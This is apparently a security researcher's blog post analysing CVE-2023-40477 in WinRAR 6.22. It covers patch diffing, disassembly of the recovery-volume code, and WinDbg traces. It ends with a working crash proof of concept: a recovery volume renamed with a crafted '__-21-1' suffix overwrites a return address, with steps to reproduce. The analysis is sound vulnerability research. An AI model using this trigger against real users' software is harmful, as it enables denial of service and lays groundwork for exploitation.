CVE-2023-40477 Root Cause Analysis

CVE-2023-40477

I’ve recently been looking at N-day vulnerabilities in Windows software in an attempt to hone my reverse engineering and exploit development skills. Last month, I read about an interesting bug in WinRAR version 6.22 and below which could result in remote code execution. This bug was assigned CVE-2023-40477. It was discovered by Zero Day Initiative.

When I started, all the information I had to go on came from the ZDI page:

This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.

I also checked WinRAR’s changelog to see if there was any more information:

 3. Bugs fixed:

      a) a security issue involving out of bounds write is fixed
         in RAR4 recovery volumes processing code.

         We are thankful to goodbyeselene working with Trend Micro Zero Day
         Initiative for letting us know about this bug;

Not much to go on, but hopefully enough.

WinRAR Files

I installed both versions of WinRAR in a Windows VM and copied all of the files for each version for comparison. Both versions come with a few different executables.

┌──(rick㉿archlap)-[~/Documents/Projects/CVE-2023-40477]
└─$ ls -l winRAR/6.22/*.exe
-rw-r--r-- 1 rick rick  644184 Aug 22 20:21 winRAR/6.22/Rar.exe
-rw-r--r-- 1 rick rick  184408 Aug 22 20:21 winRAR/6.22/RarExtInstaller.exe!
-rw-r--r-- 1 rick rick  447576 Aug 22 20:21 winRAR/6.22/Uninstall.exe
-rw-r--r-- 1 rick rick  439384 Aug 22 20:21 winRAR/6.22/UnRAR.exe
-rw-r--r-- 1 rick rick 2573400 Aug 22 20:21 winRAR/6.22/WinRAR.exe

┌──(rick㉿archlap)-[~/Documents/Projects/CVE-2023-40477]
└─$ ls -l winRAR/6.23/*.exe
-rw-r--r-- 1 rick rick  644184 Aug 22 20:21 winRAR/6.23/Rar.exe
-rw-r--r-- 1 rick rick  184408 Aug 22 20:21 winRAR/6.23/RarExtInstaller.exe
-rw-r--r-- 1 rick rick  447576 Aug 22 20:21 winRAR/6.23/Uninstall.exe
-rw-r--r-- 1 rick rick  439896 Aug 22 20:21 winRAR/6.23/UnRAR.exe
-rw-r--r-- 1 rick rick 2574424 Aug 22 20:21 winRAR/6.23/WinRAR.exe

WinRAR Recovery Volumes

The ZDI page states that the vulnerability has something to do with processing “recovery volumes”. I’m no WinRAR expert so I hadn’t heard of these before. After looking into this a bit, I found out that WinRAR can split an archive into multiple smaller parts. It can also be configured to generate a number of “recovery volumes”. As an example, let’s say you use WinRAR to generate an archive that is split into ten parts and include a single recovery volume. If you copy the archive files somewhere and one of the parts gets corrupted, you can use the single recovery volume to regenerate the corrupt or missing part. If two parts or corrupted, then you are out of luck unless you also generated two recovery volumes.

For testing, I downloaded a large ISO file and split it into a multi-part archive in RAR4 format.

WinRAR 1

I also added a single recovery volume.

WinRAR 2

I then renamed one of the parts so it wouldn’t be found during decompression and WinRAR would therefore have to use the recovery volume. Here’s an example of using the ‘rar’ command to reconstruct an archive:

c:\Program Files\WinRAR>rar rc c:\users\n00b\Downloads\BIGTEST.part1.rar

RAR 6.22 x64   Copyright (c) 1993-2023 Alexander Roshal   29 May 2023
Trial version             Type 'rar -?' for help

1 recovery volumes found
Calculating checksums of all volumes.
c:\users\n00b\Downloads\BIGTEST.part1.rar
c:\users\n00b\Downloads\BIGTEST.part2.rar
c:\users\n00b\Downloads\BIGTEST.part3.rar
c:\users\n00b\Downloads\BIGTEST.part4.rar
c:\users\n00b\Downloads\BIGTEST.part6.rar
c:\users\n00b\Downloads\BIGTEST.part1.rev
1 volumes missing
Reconstructing...
Creating c:\users\n00b\Downloads\BIGTEST.part5.rar 100%
Done

Patch Diffing

Next, I wanted to compare both versions of rar.exe to look for differences. I had hoped that the vulnerable code might be easy to spot in the changes. I used Ghidra and Bindiff to perform the comparison between both versions of rar.exe. Only five functions were changed.

Bindiff output

I set a breakpoint at each of the five changed functions and then ran a recovery operation on my test archive. I only got hits on two functions:

rar+0x4AAC4
rar+0x3F208

rar + 0x4AAC4

The first function was small and fairly simple:

Small function

The old version is on the right, new version on the left. The functions are almost identical with the exception of a new basic block added in the new version. In the original version, the function performs some dereferences and other calculations to come up with a pointer that gets stuck into RDI. Then it tests to ensure RDI is not zero. Then it sets RAX to zero. The “STOSB, REP” operation copies that 0x0 byte to the location that RDI points to and then increments the RDI register and decrements the RCX register. It repeats this copy operation, incrementing RDI over and over until RCX equals zero. It’s basically performing a memset operation on some buffer with the value of zero.

The new version adds an extra basic block (in red on the left). This block sets RCX from some other location. It seemed like maybe there was a way that the RCX register could have an invalid value, which could result in the STOSB, REP operation being performed an incorrect number of times. If RCX were set too high, then the loop would copy zero’s outside of the range of the buffer and into some other memory causing a buffer overflow.

This could potentially be useful, but it’s very unlikely that the circumstances would exist where you could overflow this specific buffer with only zero’s and end up gaining remote code execution. More likely you could only crash the system. I was hoping for something more interesting, and this was still only a guess at the problem. I decided to turn my attention to the other function at offset 0x3F208.

rar + 0x3F208

This function was much larger than the other and had small changes scattered throughout. Though there was one section that seemed to be changed more than the rest.

0x2F208

The red blocks near the top in the newer version introduce a series of checks that, if failed, all lead the same exit point. Then down near the bottom there’s a tan block which had a new check added and the last nine instructions moved to after the check. This is where the vulnerability lies. After some reverse engineering of this block, here’s what I found

.text:000000000003F7CC
.text:000000000003F7CC loc_3F7CC:              
.text:000000000003F7CC lea     rdx, [rbp+20490h+pRevFileName]       ; pRevFileName
.text:000000000003F7D0 mov     rcx, rdi                             ; Some kind of object with vtable
.text:000000000003F7D3 call    sub_24E64                            ; Get handle to REVobj and store in object at offset 0x08
.text:000000000003F7D8 mov     eax, dword ptr [rbp+20490h+var_6450] ; 1 for some reason
.text:000000000003F7DE add     eax, r13d                            ; r13d is 5 for some reason
.text:000000000003F7E1 cdqe                                         ; sign extend EAX into RAX
.text:000000000003F7E3 mov     [r12+rax*8-8], rdi                   ; r12 is a stack pointer
.text:000000000003F7E3                                              ; rdi is pointer to RevObject

R12 is a stack pointer. EAX was an unknown value (in my case it was set to 1). R13d was set to 5, but I didn’t know why at first. Those two values are added together and stored back into EAX. The result is then sign-extended into the RAX register. Then we hit the critical instruction:

.text:000000000003F7E3 mov     [r12+rax*8-8], rdi ; r12 is a stack pointer

The instruction performs the operation R12+(RAX*8)+8 to calculate a new stack pointer. It then stores the value of RDI at that location. RDI contains a pointer to some custom object that seems to represent the recovery file. I wasn’t sure where the EAX and R13D came from, but if they could be manipulated to something very high, or even a negative number, I could potentially adjust the destination stack pointer to somewhere unexpected to obtain an out of bounds write. This seemed like a juicy target. I just had to figure out where EAX and R13D came from and see if there was a way I could set them to something unexpected.

Working backwards through the basic blocks hit by my test archive file, I eventually came to the following block:

.text:000000000003F61A
.text:000000000003F61A loc_3F61A:              ; RAR object pointer
.text:000000000003F61A lea     rcx, [rbp+20490h+pRarObj]
.text:000000000003F621 call    sub_246C4       ; This func gets the number of parts from the REV
.text:000000000003F626 movzx   ecx, al
.text:000000000003F629 inc     ecx
.text:000000000003F62B mov     [rdi], ecx      ; 5
.text:000000000003F62D lea     rdi, [rdi-4]
.text:000000000003F631 sub     rsi, 1
.text:000000000003F635 jnz     short loc_3F61A

This block read certain bytes from the “.rev” recovery file and stored them into those two variables used in the later calculations. This meant that I could potentially modify the REV file to contain large values which would cause an out of bounds write later on.

Modifying the REV File

After further reversing this function, I found that the two values were pulled from the very end of the REV file before any processing or decompression.

└─$ xxd BIGTEST2.part001.rev|tail -n3
003fffd0: 53eb 9b49 0d94 2fcb a94b 614a 7e5f cd01  S..I../..KaJ~_..
003fffe0: 9f7a f71f 2d9e 93ab d873 312a 6b97 3ceb  .z..-....s1*k.<.
003ffff0: 3f79 0058 dc92 b407 007b 0000 a269 ae09  ?y.X.....{...i..
                                ^^   ^^

I modified the file to include very large values:

└─$ xxd BIGTEST2.part001.rev|tail -n3
003fffd0: 53eb 9b49 0d94 2fcb a94b 614a 7e5f cd01  S..I../..KaJ~_..
003fffe0: 9f7a f71f 2d9e 93ab d873 312a 6b97 3ceb  .z..-....s1*k.<.
003ffff0: 3f79 0058 dc92 b407 aaff bbcc a269 ae09  ?y.X.........i..
                                ^^   ^^

Then I tried to use it to reconstruct my archive. Unfortunately, this lead to a checksum error, and the vulnerable code was no longer hit.

RAR 6.22 x64   Copyright (c) 1993-2023 Alexander Roshal   29 May 2023
Trial version             Type 'rar -?' for help

Calculating checksums of all volumes.
C:\Users\n00b\Downloads\BIGTEST2.part001.rev
C:\Users\n00b\Downloads\BIGTEST2.part001.rev - checksum error
0 recovery volumes found

It turned out that the checksum comparison was done in the very next basic block.

.text:000000000003F658 lea     rax, [r14-4]
.text:000000000003F65C mov     [rsp+20590h+var_20568], ebx
.text:000000000003F660 mov     [rsp+20590h+var_20570], rax
.text:000000000003F665 mov     rax, [rsp+20590h+var_20540]
.text:000000000003F66A mov     r9d, [rax+93F0h]
.text:000000000003F671 xor     r8d, r8d
.text:000000000003F674 lea     rdx, [rsp+20590h+checksum]
.text:000000000003F679 lea     rcx, [rbp+20490h+pRarObj]
.text:000000000003F680 call    sub_251E4
.text:000000000003F685 cmp     esi, [rsp+20590h+checksum] ; Checksum comparison
.text:000000000003F689 jz      short loc_3F6D5

I used WinDbg to obtain the two checksum values being compared.

0:000> r rsi
rsi=0000000009ae69a2

0:000> dd rsp+44 L1
00000083`3d4cea04  58a7da77

Then I searched the REV file for these values. It turned out that the checksum is stored in the very last four bytes in the REV file.

┌──(rick㉿archlap)-[~/…/Projects/CVE-2023-40477/rarFiles/modified]
└─$ xxd BIGTEST2.part001.rev|tail -n1
003ffff0: 3f79 0058 dc92 b407 aaff bbcc a269 ae09  ?y.X.........i..
                                        ^^^^ ^^^^

I then manually modified the file to include the correct checksum.

┌──(rick㉿archlap)-[~/…/Projects/CVE-2023-40477/rarFiles/modified]
└─$ xxd BIGTEST2.part001.rev|tail -n1
003ffff0: 3f79 0058 dc92 b407 aaff bbcc 77da a758  ?y.X........w..X
                                        ^^^^ ^^^^

Now I was passing the checksum validation routine, but I still didn’t hit the vulnerable code! It turned out that I was getting stuck at this block:

.text:000000000003F753
.text:000000000003F753 loc_3F753:
.text:000000000003F753 mov     edx, dword ptr [rbp+20490h+var_6450+4]
.text:000000000003F759 mov     ecx, [rbp+20490h+var_6448] 
.text:000000000003F75F lea     eax, [rdx+rcx]
.text:000000000003F762 cmp     eax, 0FFh
.text:000000000003F767 jg      loc_3F6A7

This block added up my two values and stored them in EAX. Then it checked to ensure that the total was <= 0xff. This was a real bummer! The total had to be less than 0xff (255 in decimal). The “jg” instruction performs a jump if the value in EAX is greater than 0xFF. This instruction is signed, meaning that if EAX stores a negative number, it will consider that in the comparison. So theoretically, if I could manipulate the values in such a way that they add together to form a negative number, I could still pass this check and obtain an out of bounds write.

Unfortunately, the routine which loaded these values from the file would only load a single byte for each one. There was no possible way for me to edit the values in such a way that they would be considered negative. However, hope was not lost!

Another Path

There are actually two primary code paths that lead to the 0xFF check block. These are shown in the below screenshot. One is outlined in a pink box on the right and the other outlined in blue on the left.

Two paths

My test archive had been taking me down the path to the right, where the values were read from inside the REV file itself. But there was this other path on the left that could lead us to the same check and ultimately the vulnerable code. Perhaps there was something useful in there? Right in the middle of that path is the following code block (colored yellow in the above screenshot).

.text:000000000003F71F
.text:000000000003F71F loc_3F71F:              
.text:000000000003F71F mov     rcx, r15
.text:000000000003F722 call    charToInt
.text:000000000003F727 mov     dword ptr [rbp+rsi*4+20490h+var_6450], eax
.text:000000000003F72E test    eax, eax
.text:000000000003F730 jz      short loc_3F739

This basic block is used as part of a process that reads the recovery volume’s filename. It starts at the end of the string, just before the “.rev” extension and works backward. Let’s take a look at the “charToInt” function. Note that I named the function myself, that’s not it’s actual name.

charToInt

It’s not very large so it wasn’t too difficult to follow it through. When this function is called, RCX contains a pointer to a unicode string containing the full file path and filename. Let’s say for this example that RCX contains the string, “BIGTEST2.part001.rev”. Let’s look at the first basic block.

.text:00000000000508F4 sub_508F4 proc near
.text:00000000000508F4 movzx   edx, word ptr [rcx]
.text:00000000000508F7 xor     r8b, r8b
.text:00000000000508FA cmp     dx, 2Dh ; '-'
.text:00000000000508FE jnz     short loc_50907

It first copies the first WORD from the string into EDX. Since the string is unicode, a single letter would take two bytes. In this case, the first byte is 0x00 and the second byte contains the important information about what the character is. Next, R8B is set to 0x0. Then the function then checks to see if the character is ‘-’. If the character was a hyphen, then we would not take the jump and we’d hit the next basic block:

.text:0000000000050900 movzx   edx, word ptr [rcx+2]
.text:0000000000050904 mov     r8b, 1

This block would load the next character into EDX and set r8b to 1. In our case the character is not a hyphen, so we take the jump and skip around that block and land at the next one.

.text:0000000000050907 loc_50907:
.text:0000000000050907 lea     r9, [rcx+2]
.text:000000000005090B cmovnz  r9, rcx
.text:000000000005090F xor     eax, eax
.text:0000000000050911 jmp     short loc_50930

If a hyphen was not found earlier, then the current character (RCX) is copied into R9. If a hyphen was found, then the next character (RCX+2) is copied instead. Then the EAX is zeroed out. We then jump into the beginning of a loop.

.text:0000000000050930 cmp     dx, 30h ; '0'
.text:0000000000050934 jnb     short loc_50913

This block checks to see if the current character in the DX register is below 0x30, which is a zero ASCII character or ‘0’. If it is below, we would exit the loop. If not, then we hit another check in the next block.

.text:0000000000050913 cmp     dx, 39h ; '9'
.text:0000000000050917 ja      short loc_50936

This block checks the current character to see if it’s above 0x39, which is the ASCII code for ‘9’. If so, we exit the loop. If not, we continue on.

.text:0000000000050919 lea     rcx, [rax+rax*4]
.text:000000000005091D movzx   eax, dx
.text:0000000000050920 lea     rax, [rax+rcx*2]
.text:0000000000050924 add     rax, 0FFFFFFFFFFFFFFD0h
.text:0000000000050928 add     r9, 2
.text:000000000005092C movzx   edx, word ptr [r9]

The first instruction adds RAX+RAX*4 and stores the total in RCX. In this case, RAX is zero, so RCX will become zero. Next, the current character is copied into EAX and is then zero-extended. It then adds RAX+RCX*2 and stores the result back into RAX. In this case, RAX would be 0x31 (“1”). The result of 1 + 0 * 2 = 1, so RAX becomes 1. The next instruction adds 0xFFFFFFFFFFFFFFD0 to RAX. This actually is subtracting 0x30. So in this example, 0x31 becomes 0x1. It’s essentially converting the ASCII “1” to the integer 1. It does this for any character between 0 and 9. It then adds 2 to the R9 register and copies the next unicode character into EDX. Then the loop starts over. This loop will continue until it finds a character that’s not between 0 and 9. Once it exits, we hit this block:

.text:0000000000050936 test    r8b, r8b
.text:0000000000050939 jz      short locret_50943

It checks to see if r8b is still set to zero. If so, we jump to the final basic block. If not, we hit a different one instead:

.text:000000000005093B test    rax, rax
.text:000000000005093E js      short locret_50943

This block checks to see if RAX has the sign flag set. If so, it jumps to the end. If not, we hit one final basic block:

.text:0000000000050940 neg     rax

This block simply negates the RAX register. So a string of “-1” would become the actual integer -1. We then reach the final block.

.text:0000000000050943 locret_50943:
.text:0000000000050943 retn
.text:0000000000050943 sub_508F4 endp

It simply returns the value in the RAX register. Going back to our example string, “BIGTEST2.part001.rev”, this function would process the “001” part of the string and stop when it hit the “t”. The RAX register would then return the value 1. What would happen if we renamed the file to, “BIGTEST2.part-10.rev”? The result is that RAX would contain the actual value -10, or 0xffffffff`fffffff0. A negative value! Just what I needed! This turned out to be the crux of this vulnerability.

My next problem was that I wasn’t actually hitting this code path. There is a check earlier on that I kept failing. I would just modify registers in WinDbg to hit this path in order to reverse engineer the code and see if the path was exploitable. I had to figure out why I wasn’t hitting this code path and see if I could force the program to take this route instead.

The DIL Check

The decision of which path to take boiled down to this tiny code block:

.text:000000000003F591 loc_3F591:
.text:000000000003F591 test    dil, dil
.text:000000000003F594 jz      loc_3F6E3

If the DIL register was set to 0, then the jump is taken to the left of the code graph and down the path to the vulnerable code. If not then it takes the other path where it reads the variable values from inside the REV file. I needed to figure out a way to ensure the DIL register was set to zero. Zooming out in the IDA graph a bit we see this:

Small loop

The very first instruction at the top set the DIL register to 1. I needed to find some code that could change this to zero. The second to last block in the screenshot above has some code that can do this.

.text:000000000003F583 loc_3F583:
.text:000000000003F583 movzx   edi, dil
.text:000000000003F587 cmp     edx, 2
.text:000000000003F58A cmovz   edi, ebx
.text:000000000003F58D mov     [rsp+20590h+var_20550], edi

This block compares the value stored in EDX to 0x2. Then, if EDX is equal to 2, it will copy the contents of the EBX register into EDI (which will also set DIL). EBX seemed to always be set to zero. This was the only location I found that could cause DIL to be set to zero. So what I needed to do next was figure out how to set EDX to 2. Let’s look at the first basic block again.

.text:000000000003F537 mov     dil, 1
.text:000000000003F53A mov     [rsp+20590h+var_20550], edi
.text:000000000003F53E lea     rcx, [rbp+20490h+revFileName]
.text:000000000003F542 call    sub_3721C
.text:000000000003F547 mov     rcx, rax
.text:000000000003F54A test    rax, rax
.text:000000000003F54D jz      short loc_3F591

The function call in the middle of this block locates the last “.” character in the file name string via a nested call to wcschr. It then returns a pointer to the location within the string containing that character. That pointer gets moved into the RCX Register. As long as the pointer returned is not null, we jump to the next block.

.text:000000000003F54F mov     edx, ebx
.text:000000000003F551 sub     rcx, 2
.text:000000000003F555 lea     rax, [rbp+20490h+revFileName]
.text:000000000003F559 cmp     rcx, rax
.text:000000000003F55C jbe     short loc_3F591

Here, EDX is set to zero because EBX is also zero. This is important, because we need EDX to ultimately be set to 2 in order to pass our check later on! The unicode string pointer in RCX is reduced by two, which points to the character just before the file extension begins. It then ensures this location is not the beginning of the string. If not, we continue to the next block in which we enter a small loop.

.text:000000000003F55E loc_3F55E:
.text:000000000003F55E movzx   r8d, word ptr [rcx]
.text:000000000003F562 cmp     r8w, 2Eh ; '.'
.text:000000000003F567 jz      short loc_3F583

This block checks the current character to see if it is another period. If it is, we exit the loop. If not, we continue to the next block in the loop.

.text:000000000003F569 sub     rcx, 2
.text:000000000003F56D lea     eax, [rdx+1]
.text:000000000003F570 cmp     r8w, 5Fh ; '_'
.text:000000000003F575 cmovnz  eax, edx
.text:000000000003F578 mov     edx, eax
.text:000000000003F57A lea     rax, [rbp+20490h+revFileName]
.text:000000000003F57E cmp     rcx, rax
.text:000000000003F581 ja      short loc_3F55E

The current string pointer in the RCX register is decremented by two to move to the previous character. Then we take the value in EDX (currently zero) and add 1. That gets stored in EAX. Next, the value of the current character stored in R8W is compared to an underscore. If an underscore is not found, EDX is copied back into EAX. This overwrites EAX with zero. Then EAX is copied back into EDX.

This is the important bit! If an underscore had been found, then EAX would now be set to 1. When the “mov EDX, EAX” instruction runs, it would copy the 1 back into EDX. If no underscore is found, then EDX stays set to zero.

Finally it checks to see if we’ve reached the very beginning of the file name string and run out of characters. If so, we exit the loop and reach our check block. If not, we loop again.

If you follow through this loop again, you’ll see that it’s essentially just counting the number of underscore characters in the file name string. The total count is kept in the EDX register. This means that in order to pass our check in the next block, we need two underscore characters in the filename string. This should set EDX to 2, which will result in DIL being set to zero, which will result in the program choosing the vulnerable code path!

Out of Bounds Write

Now we have all the information we need to perform an out of bounds write. Let’s test it! I’ll rename the REV file to something that should trigger the vulnerable code.

BIGTEST2.part__-5-1.rev

This should theoretically cause us to end up with a negative number in RAX where the stack write happens here:

.text:000000000003F7D8 mov     eax, dword ptr [rbp+20490h+var_6450]
.text:000000000003F7DE add     eax, r13d
.text:000000000003F7E1 cdqe
.text:000000000003F7E3 mov     [r12+rax*8-8], rdi

I set a breakpoint in WinDbg at the rar+3F7D8 instruction and attempt to recover the archive with my malformed recovery volume file name.

0:000> bp rar+3F7D8
0:000> g

Breakpoint 0 hit
RAR+0x3f7d8:
00007ff6`6699f7d8 8b8540a00100    mov     eax,dword ptr [rbp+1A040h] ss:00000038`cf2e86b0=00000001

0:000> p
RAR+0x3f7de:
00007ff6`6699f7de 4103c5          add     eax,r13d

0:000> r eax
eax=1

0:000> r r13d
r13d=fffffffb

0:000> p
RAR+0x3f7e1:

00007ff6`6699f7e1 4898            cdqe

0:000> r rax
rax=00000000fffffffc

0:000> p
RAR+0x3f7e3:
00007ff6`6699f7e3 49897cc4f8      mov     qword ptr [r12+rax*8-8],rdi ds:00000038`cf2eeb88=0000000000000000

0:000> r rax
rax=fffffffffffffffc

Success! EAX contained the “1” part of my file name string. R13B contained the “-5”. When added together, RAX contains a negative number. Now I could manipulate the stack pointer in an unexpected way to achieve an out of bounds write!

0:000> ?r12 + (rax*8) - 8
Evaluate expression: 243994127240 = 00000038`cf2eeb88

0:000> r rsp
rsp=00000038cf2ce570

Return Address Overwrite PoC

The next question is where do I write to? I don’t have control over the contents of the RDI register. No matter what I do, I’ll only be able to write a pointer to the rev object to our specified location. This is of limited use. As a proof of concept, I can write a payload that will cause rar.exe to crash. This can be done by overwriting a return address on the stack with the RDI pointer.

Let’s look at the call stack at the time that the overwrite takes place.

0:000> k
 # Child-SP          RetAddr               Call Site
00 00000038`cf2ce570 00007ff6`6699ef05     RAR+0x3f7e3
01 00000038`cf2eeb10 00007ff6`669767de     RAR+0x3ef05
02 00000038`cf2f7440 00007ff6`6699b2cd     RAR+0x167de
03 00000038`cf2ff8c0 00007ff6`669bd618     RAR+0x3b2cd
04 00000038`cf2ff900 00007ffd`07567614     RAR+0x5d618
05 00000038`cf2ff940 00007ffd`07d626a1     KERNEL32!BaseThreadInitThunk+0x14
06 00000038`cf2ff970 00000000`00000000     ntdll!RtlUserThreadStart+0x21

Now let’s check the base value in R12:

0:000> r r12
r12=00000038cf2eebb0

Let’s choose the closest return address pointer on the stack to our R12 value and subtract the two values to figure out the distance.

0:000> dqs 00000038`cf2eeb08 L2
00000038`cf2eeb08  00007ff6`6699ef05 RAR+0x3ef05    <-- Return address pointer
00000038`cf2eeb10  00000038`cf2eebb0

0:000> ?r12 - 00000038`cf2eeb08
Evaluate expression: 168 = 00000000`000000a8

I need to subtract 0xa8 from R12 in order to overwrite the return address. I know that the value of RAX will be multiplied by 8 and then have 8 subtracted, so I’ll just reverse the process.

0:000> ?(-a8 + 8) / 8
Evaluate expression: -20 = ffffffff`ffffffec

I need RAX to be set to decimal -20, or hexadecimal ffffffff`ffffffec at the time of the out of bounds write. But recall that there are two variables that get added together to determine EAX as seen below.

.text:000000000003F7D8 mov     eax, dword ptr [rbp+20490h+var_6450]
.text:000000000003F7DE add     eax, r13d
.text:000000000003F7E1 cdqe
.text:000000000003F7E3 mov     [r12+rax*8-8], rdi

With my test file name of “BIGTEST2.part__-5-1.rev”, EAX was first set to 1 and R13d was set to -5 before being added to EAX. Since I will be adding 1 to the total, I’ll have to first set EAX to -21. Then when I add 1, I’ll end up with 20 and I should overwrite the return pointer. Let’s try.

BIGTEST2.part__-21-1.rev

This file name should pass all the checks:

I have two underscores to ensure I take the vulnerable code path.
I have -21 and +1 in the file name, which will be added together later on to make -20.
-20 is less than 0xff, so it will pass the safety check.
This -20 offset should result in the RDI value being written to the return address location on the stack.

I set a breakpoint on the write location and check to see what happens:

Breakpoint 0 hit
RAR+0x3f7e3:
00007ff6`6699f7e3 49897cc4f8      mov     qword ptr [r12+rax*8-8],rdi ds:00000008`678eeac8=00007ff66699ef05

0:000> r rdi
rdi=00000149d59f50c0

0:000> k
 # Child-SP          RetAddr               Call Site
00 00000008`678ce530 00007ff6`6699ef05     RAR+0x3f7e3
01 00000008`678eead0 00007ff6`669767de     RAR+0x3ef05
02 00000008`678f7400 00007ff6`6699b2cd     RAR+0x167de
03 00000008`678ff880 00007ff6`669bd618     RAR+0x3b2cd
04 00000008`678ff8c0 00007ffd`07567614     RAR+0x5d618
05 00000008`678ff900 00007ffd`07d626a1     KERNEL32!BaseThreadInitThunk+0x14
06 00000008`678ff930 00000000`00000000     ntdll!RtlUserThreadStart+0x21

0:000> p
RAR+0x3f7e8:
00007ff6`6699f7e8 8b742434        mov     esi,dword ptr [rsp+34h] ss:00000008`678ce564=00000000

0:000> k
 # Child-SP          RetAddr               Call Site
00 00000008`678ce530 00000149`d59f50c0     RAR+0x3f7e8
01 00000008`678eead0 00000008`678eeb70     0x00000149`d59f50c0
02 00000008`678eead8 00000000`00000002     0x00000008`678eeb70
03 00000008`678eeae0 00000008`678eebd0     0x2
04 00000008`678eeae8 00000000`00000002     0x00000008`678eebd0
05 00000008`678eeaf0 00000000`00000000     0x2

In the above output we can see that the value in RDI overwrites a return address on the stack, which messes up the call stack. Now if I continue execution…

0:000> g
(4e0.242c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000149`d59f50c0 084e9d          or      byte ptr [rsi-63h],cl ds:00000008`678fe7dd=7f

An access violation! That’s it! A working PoC. The CPU is now pointing at the REV object and trying to execute it as code. This is not allowed because the object’s memory is not executable.

0:000> !address rip
...                                  
Usage:                  Heap
Base Address:           00000149`d5980000
End Address:            00000149`d59f9000
Region Size:            00000000`00079000 ( 484.000 kB)
State:                  00001000          MEM_COMMIT
Protect:                00000004          PAGE_READWRITE
Type:                   00020000          MEM_PRIVATE
Allocation Base:        00000149`d5980000
Allocation Protect:     00000004          PAGE_READWRITE
More info:              heap owning the address: !heap 0x149d5980000
More info:              heap segment
More info:              heap entry containing the address: !heap -x 0x149d59f50c0

Conclusion

If you want to make your own corrupt RAR file to trigger this bug, here are the steps:

Create a RAR4 archive using WinRAR.
Ensure the archive is split into multiple components.
Include one recovery volume in your archive.
Once created, rename the recovery volume to end with “.part__-21-1.rev”.
Delete one of the other parts of the archive.
Attempt to extract your archive in WinRAR.

This should cause WinRAR to crash.

I spent some time trying to think of ways to weaponize this bug, but I think it’s very unlikely. The main problem is that you can’t control the contents of the out of bounds write. You can only control the location. The pointer being written is not very useful. One idea I thought of would be to overwrite a stack variable with the pointer in the hopes that it could cause another more useful bug.

For example, let’s say there is a memcpy operation that relies on a pointer or value stored on the stack. If I could overwrite it with my pointer, it may allow me to copy too much data, or to copy the data to the wrong location. If that data is controllable by me, then it could possibly lead to a more interesting and exploitable bug. I spent a little time looking for something like this but didn’t find one.

Regardless, this was a fun exercise to hone my skills. I look forward to the next challenge!